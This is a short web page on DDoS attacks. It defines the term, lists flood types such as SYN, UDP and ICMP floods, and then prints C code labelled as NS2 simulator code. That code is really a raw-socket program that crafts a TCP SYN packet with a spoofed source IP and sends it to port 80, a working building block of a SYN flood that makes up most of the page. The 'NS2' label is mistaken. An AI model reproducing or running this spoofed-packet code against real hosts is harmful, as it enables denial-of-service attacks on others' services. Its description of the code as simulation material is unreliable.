ns2 ddos attack, DDoS (Distributed Denial of Service) was a basic flood attack that simply tried to overwhelm a connection with traffic with the goal of taking that web property offline.
What is D-DOS attack?
D-DoS (Distributed Denial of Service)-DDoS was a basic attack against availability.
Different Types of DDOS Attack
UDP floods.
SYN flood.
ICMP flood.
Zero-day DDOS attack.
Fragmented Packet attacks.
Spoofed-packet floods.
Ping of Death.
Smurf DDOS.
Sample Ns2 code for DDOS-Attack.
#include<sys/socket.h> #include<stdlib.h> //for exit(0); #include<errno.h> //For errno - the error number #include<netinet/tcp.h> //Provides declarations for tcp header #include<netinet/ip.h> //Provides declarations for ip header struct pseudo_header //needed for checksum calculation { unsigned int source_address; unsigned int dest_address; unsigned char placeholder; unsigned char protocol; unsigned short tcp_length; struct tcphdr tcp; }; unsigned short csum(unsigned short *ptr,int nbytes) { register long sum; unsigned short oddbyte; register short answer; sum=0; while(nbytes>1) { sum+=*ptr++; nbytes-=2; } if(nbytes==1) { oddbyte=0; *((u_char*)&oddbyte)=*(u_char*)ptr; sum+=oddbyte; } sum = (sum>>16)+(sum & 0xffff); sum = sum + (sum>>16); answer=(short)~sum; return(answer); } int main (void) { int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); char datagram[4096] , source_ip[32]; struct iphdr *iph = (struct iphdr *) datagram; struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip)); struct sockaddr_in sin; struct pseudo_header psh; strcpy(source_ip , ""); sin.sin_family = AF_INET; sin.sin_port = htons(80); sin.sin_addr.s_addr = inet_addr (""); memset (datagram, 0, 4096); /* zero out the buffer */ iph->ihl = 5; iph->version = 4; iph->tos = 0; iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr); iph->id = htons(54321); //Id of this packet iph->frag_off = 0; iph->ttl = 255; iph->protocol = IPPROTO_TCP; iph->check = 0; //Set to 0 before calculating checksum iph->saddr = inet_addr ( source_ip ); //Spoof the source ip address iph->daddr = sin.sin_addr.s_addr; iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1); tcph->source = htons (1234); tcph->dest = htons (80); tcph->seq = 0; tcph->ack_seq = 0; tcph->doff = 5; /* first and only tcp segment */ tcph->fin=0; tcph->syn=1; tcph->rst=0; tcph->psh=0; tcph->ack=0; tcph->urg=0; tcph->window = htons (5840); /* maximum allowed window size */ tcph->check = 0; tcph->urg_ptr = 0; psh.source_address = inet_addr( source_ip ); psh.dest_address = sin.sin_addr.s_addr; psh.placeholder = 0; psh.protocol = IPPROTO_TCP; psh.tcp_length = htons(20); memcpy(&psh.tcp , tcph , sizeof (struct tcphdr)); tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header)); int one = 1; const int *val = &one; if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0) { printf ("Error setting IP_HDRINCL. Error number : %d . Error message : %s \n" , errno , strerror(errno)); exit(0); } if (sendto (s, /* our socket */ datagram, /* the buffer containing headers and data */ iph->tot_len, /* total length of our datagram */ 0, /* routing flags, normally always 0 */ (struct sockaddr *) &sin, /* socket addr, just like in */ sizeof (sin)) < 0) /* a normal send() */ { printf ("error\n"); } //Data send successfully else { printf ("Packet Send \n"); } return 0; }Tweet